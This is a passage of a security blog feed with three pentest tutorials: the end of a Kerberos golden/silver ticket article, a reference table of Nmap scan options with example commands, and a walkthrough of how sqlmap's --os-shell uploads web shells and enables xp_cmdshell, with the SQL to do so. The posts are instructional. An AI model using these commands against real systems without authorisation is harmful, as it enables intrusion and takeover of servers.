&lt;p&gt;Since no TGT is available to repeatedly request tickets, the attacker must target a specific service. The service type can be selected from the list below.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F72p168t65c598tn7k30b.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F72p168t65c598tn7k30b.png" alt=" " width="623" height="313"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpmweggbpsr7rdbwt5dia.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpmweggbpsr7rdbwt5dia.png" alt=" " width="637" height="398"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The command &lt;code&gt;dir \\scene.cyberpeace.com\c$&lt;/code&gt; executes successfully, and a domain administrator account can be created.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9hdr2mye089z7fulr0ax.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9hdr2mye089z7fulr0ax.png" alt=" " width="641" height="343"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Differences between Golden and Silver Tickets
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Scope of Access
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Golden Ticket&lt;/strong&gt;: Forges a TGT, thereby granting access to any Kerberos‑protected service.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Silver Ticket&lt;/strong&gt;: Forges a service ticket (ST), granting access only to the specific service for which it was crafted (e.g., CIFS).&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Authentication Flow
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Golden Ticket&lt;/strong&gt;: Still interacts with the KDC (the forged TGT is presented to its ticket‑granting service to obtain service tickets) but skips the authentication service (AS) exchange entirely.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Silver Ticket&lt;/strong&gt;: Does not interact with the KDC at all; the forged service ticket is presented directly to the target server.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Encryption Mechanism
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Golden Ticket&lt;/strong&gt;: Encrypted with the NTLM hash of &lt;code&gt;krbtgt&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Silver Ticket&lt;/strong&gt;: Encrypted with the NTLM hash of the service account associated with the target server.&lt;/li&gt;
&lt;/ul&gt;




</description>
      <category>ticket</category>
      <category>passing</category>
      <category>attacks</category>
      <category>cybersecurity</category>
    </item>
    <item>
      <title>Common Nmap Parameters</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Tue, 09 Jun 2026 23:21:22 +0000</pubDate>
      <link>https://dev.to/excalibra/common-nmap-parameters-1815</link>
      <guid>https://dev.to/excalibra/common-nmap-parameters-1815</guid>
      <description>&lt;p&gt;The following table lists frequently used Nmap parameters together with a brief description of each.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Parameter&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-sT&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;TCP connect() scan. Because it completes the full connection, this method leaves a large number of connection requests and error messages in the target host’s logs.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-sS&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;SYN (half-open) scan. Few systems log this activity; however, it requires root privileges.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;-sF&lt;/code&gt;, &lt;code&gt;-sX&lt;/code&gt;, &lt;code&gt;-sN&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Stealth FIN scan, Xmas Tree scan, and Null scan modes, respectively.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-sP&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Ping scan (host discovery only). Nmap performs a ping scan by default before port scanning; only hosts that respond are scanned further.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-sU&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;UDP scan. Results are inherently unreliable because UDP is connectionless and an unanswered probe is ambiguous.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-sA&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;ACK scan. This advanced scanning method is typically used to map firewall rule sets.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-sV&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Probe port service versions.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-Pn&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Skip host discovery (no ping before scanning). Some firewalls block ping; this option lets the port scan proceed against hosts that do not respond to it.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-v&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Verbose mode: display scan progress as it runs. Recommended.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-h&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Help option. Provides the clearest and most comprehensive help documentation.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-p&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Specify ports, for example: &lt;code&gt;1-65535&lt;/code&gt;, &lt;code&gt;1433&lt;/code&gt;, &lt;code&gt;135&lt;/code&gt;, &lt;code&gt;22&lt;/code&gt;, &lt;code&gt;80&lt;/code&gt;, etc.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-O&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Enable remote operating system detection. False positives may occur.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-A&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Comprehensive (aggressive) detection: enables OS detection, version detection, and script scanning in a single option.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;-oN&lt;/code&gt; / &lt;code&gt;-oX&lt;/code&gt; / &lt;code&gt;-oG&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Write the report to a file in three respective formats: normal, XML, and grepable.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-T4&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Aggressive timing template; for TCP ports it caps the dynamic scan delay at 10 ms.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-iL&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Read a list of hosts from a file, for example: &lt;code&gt;-iL C:\ip.txt&lt;/code&gt;.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  Practical Examples
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Scan open ports on a specified IP address:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
&lt;code&gt;nmap -sS -p 1-65535 -v XXX.XXX.XXX.XXX&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Scan live hosts in a /24 subnet:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
&lt;code&gt;nmap -sP XXX.XXX.XXX.XXX/24&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Scan specific ports:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
&lt;code&gt;nmap -p 80,1433,22,1521 XXX.XXX.XXX.XXX&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Detect the host operating system:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
&lt;code&gt;nmap -O XXX.XXX.XXX.XXX&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Comprehensive system detection:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
&lt;code&gt;nmap -v -A XXX.XXX.XXX.XXX&lt;/code&gt;&lt;br&gt;&lt;br&gt;
&lt;em&gt;Note: By default, Nmap scans the 1,000 most commonly used ports.&lt;/em&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Scan a specified IP range:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
&lt;code&gt;nmap XXX.XXX.XXX.XXX-XXX&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Scan through a firewall that blocks ping:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
&lt;code&gt;nmap -Pn -A XXX.XXX.XXX.XXX&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Use an NSE script to enumerate common web directories:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
&lt;code&gt;nmap -p 80 --script=http-enum.nse XXX.XXX.XXX.XXX&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>nmap</category>
      <category>cybersecurity</category>
      <category>parameters</category>
      <category>common</category>
    </item>
    <item>
      <title>The Principle of sqlmap’s `--os-shell`</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Tue, 09 Jun 2026 22:22:33 +0000</pubDate>
      <link>https://dev.to/excalibra/the-principle-of-sqlmaps-os-shell-3mb4</link>
      <guid>https://dev.to/excalibra/the-principle-of-sqlmaps-os-shell-3mb4</guid>
      <description>&lt;h2&gt;
  
  
  Preface
&lt;/h2&gt;

&lt;p&gt;When the database is MySQL, PostgreSQL, or Microsoft SQL Server, and the current user possesses the privileges required to invoke specific functions, sqlmap can be used to obtain an operating system shell.&lt;/p&gt;

&lt;p&gt;In the case of MySQL and PostgreSQL, sqlmap uploads a binary library containing user-defined functions, &lt;code&gt;sys_exec()&lt;/code&gt; and &lt;code&gt;sys_eval()&lt;/code&gt;. These two functions, once created, are capable of executing system commands.&lt;/p&gt;

&lt;p&gt;For Microsoft SQL Server, sqlmap employs the &lt;code&gt;xp_cmdshell&lt;/code&gt; stored procedure. If this procedure is disabled (it is disabled by default in Microsoft SQL Server 2005 and later), sqlmap will attempt to re‑enable it; if it does not exist, sqlmap will create it automatically.&lt;/p&gt;

&lt;p&gt;The following sections illustrate the principles behind the &lt;code&gt;--os-shell&lt;/code&gt; feature by examining injection scenarios and direct database connections for SQL Server and MySQL.&lt;/p&gt;




&lt;h2&gt;
  
  
  Injection-Based &lt;code&gt;--os-shell&lt;/code&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Prerequisites:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Write access to the web server’s document root.&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;secure_file_priv&lt;/code&gt; variable is either empty or set to a writable path.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;During a standard SQL injection, &lt;code&gt;--os-shell&lt;/code&gt; works primarily by uploading a web shell, which sqlmap then uses to execute commands.&lt;/p&gt;




&lt;h3&gt;
  
  
  Test Environment
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Operating system: Microsoft Windows Server 2012 Standard
&lt;/li&gt;
&lt;li&gt;Database: MySQL 5.1.60
&lt;/li&gt;
&lt;li&gt;Scripting language: PHP 5.4.45
&lt;/li&gt;
&lt;li&gt;Web server: Apache 2.4.39
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Initially, sqlmap is employed to detect the injection point.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhiz1r6uvb419gmx4ren8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhiz1r6uvb419gmx4ren8.png" alt=" " width="799" height="273"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;--os-shell&lt;/code&gt; flag is then invoked.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj5ohdhk9puufxjb1sc0q.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj5ohdhk9puufxjb1sc0q.png" alt=" " width="799" height="250"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;At this stage, sqlmap performs three key actions:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Probes the target to gather basic information.
&lt;/li&gt;
&lt;li&gt;Uploads a shell to the target web server.
&lt;/li&gt;
&lt;li&gt;Removes the shell upon exiting.&lt;/li&gt;
&lt;/ol&gt;




&lt;p&gt;A packet capture with Wireshark, filtered to display only HTTP traffic, reveals the sequence.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxd76v3exle17w29rpsz3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxd76v3exle17w29rpsz3.png" alt=" " width="799" height="179"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1 – sqlmap uploads a small web shell that provides file‑upload functionality.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsn19cn6pkasjuw2c3fgx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsn19cn6pkasjuw2c3fgx.png" alt=" " width="800" height="92"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhtrp73yb3szu32v6myjd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhtrp73yb3szu32v6myjd.png" alt=" " width="800" height="69"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Following the HTTP stream reveals URL‑encoded content. Once decoded, it is apparent that the file is written to disk using &lt;code&gt;INTO OUTFILE&lt;/code&gt;. The uploader’s code is hex‑encoded; decoding it exposes an upload‑capable script.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 2 – The uploaded file‑upload shell is used to transfer the actual command shell.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmp9f1c1icusj4ds1wu0o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmp9f1c1icusj4ds1wu0o.png" alt=" " width="800" height="222"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Tracking the HTTP stream shows the shell’s source code in the request body.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 3 – Commands are passed to the shell for execution.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4i9eghnjgsdtbc6h2js6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4i9eghnjgsdtbc6h2js6.png" alt=" " width="625" height="273"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 4 – The shell is deleted.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4anb8jzgd266dxkkaamu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4anb8jzgd266dxkkaamu.png" alt=" " width="668" height="243"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A command is issued to remove the shell file.&lt;/p&gt;




&lt;h2&gt;
  
  
  Database‑Based &lt;code&gt;--os-shell&lt;/code&gt;
&lt;/h2&gt;

&lt;p&gt;When the database permits external connections, sqlmap can obtain a shell directly via the &lt;code&gt;--os-shell&lt;/code&gt; flag.&lt;/p&gt;

&lt;h3&gt;
  
  
  Microsoft SQL Server
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Prerequisites:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The database server accepts external connections.
&lt;/li&gt;
&lt;li&gt;The current database user holds &lt;code&gt;sa&lt;/code&gt; (system administrator) privileges.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;With SQL Server, &lt;code&gt;--os-shell&lt;/code&gt; relies on the &lt;code&gt;xp_cmdshell&lt;/code&gt; extended stored procedure to execute operating system commands.&lt;/p&gt;




&lt;h4&gt;
  
  
  Test Environment
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Operating system: Microsoft Windows Server 2016 Datacenter
&lt;/li&gt;
&lt;li&gt;Database: Microsoft SQL Server 2008
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Sqlmap is used to connect to the database.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;sqlmap &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s2"&gt;"mssql://user:password@ip:port/dbname"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm9nw0cqhvujvniko4ubi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm9nw0cqhvujvniko4ubi.png" alt=" " width="798" height="122"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Sqlmap does not ship with the &lt;code&gt;pymssql&lt;/code&gt; module; it must be installed manually.&lt;/p&gt;

&lt;p&gt;After executing &lt;code&gt;python -m pip install pymssql&lt;/code&gt;, the connection is established successfully.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsdblmrzpuxqswh3ewv2y.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsdblmrzpuxqswh3ewv2y.png" alt=" " width="800" height="180"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;--os-shell&lt;/code&gt; command is then issued.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgf1zp2ydxedscyw1c235.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgf1zp2ydxedscyw1c235.png" alt=" " width="799" height="310"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;At this point, sqlmap performs three key actions:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Identifies the database type and displays it.
&lt;/li&gt;
&lt;li&gt;Checks whether the current user is a database administrator (i.e., verifies &lt;code&gt;sa&lt;/code&gt; privileges).
&lt;/li&gt;
&lt;li&gt;Determines whether &lt;code&gt;xp_cmdshell&lt;/code&gt; is enabled; if it is not, sqlmap attempts to enable it.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;In this instance, sqlmap was unable to activate &lt;code&gt;xp_cmdshell&lt;/code&gt; automatically.&lt;/p&gt;

&lt;p&gt;Consequently, &lt;code&gt;--sql-shell&lt;/code&gt; was used to enable it manually:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;EXEC&lt;/span&gt; &lt;span class="n"&gt;sp_configure&lt;/span&gt; &lt;span class="s1"&gt;'show advanced options'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="n"&gt;RECONFIGURE&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;EXEC&lt;/span&gt; &lt;span class="n"&gt;sp_configure&lt;/span&gt; &lt;span class="s1"&gt;'xp_cmdshell'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="n"&gt;RECONFIGURE&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fae5kodqb9t3iw2k79knr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fae5kodqb9t3iw2k79knr.png" alt=" " width="800" height="223"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;When &lt;code&gt;RECONFIGURE;&lt;/code&gt; was executed, sqlmap reported a syntax error.&lt;/p&gt;

&lt;p&gt;A Python script calling the &lt;code&gt;pymssql&lt;/code&gt; module was written to isolate the issue.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;SELECT @@version;&lt;/code&gt; command could be executed successfully.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fckj92g87aptgtggmlwwf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fckj92g87aptgtggmlwwf.png" alt=" " width="800" height="234"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The error produced when executing &lt;code&gt;RECONFIGURE;&lt;/code&gt; matched the error observed in &lt;code&gt;--sql-shell&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fscsuwl8z0s9eetfp0gao.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fscsuwl8z0s9eetfp0gao.png" alt=" " width="799" height="269"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Because the error originates in the &lt;code&gt;pymssql&lt;/code&gt; module that sqlmap uses for database connections, &lt;code&gt;xp_cmdshell&lt;/code&gt; had to be enabled with a different tool. Navicat was employed for this purpose.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhgu8bt7j6rwlfv3c2suu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhgu8bt7j6rwlfv3c2suu.png" alt=" " width="566" height="608"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The commands to enable &lt;code&gt;xp_cmdshell&lt;/code&gt; were then executed.&lt;/p&gt;

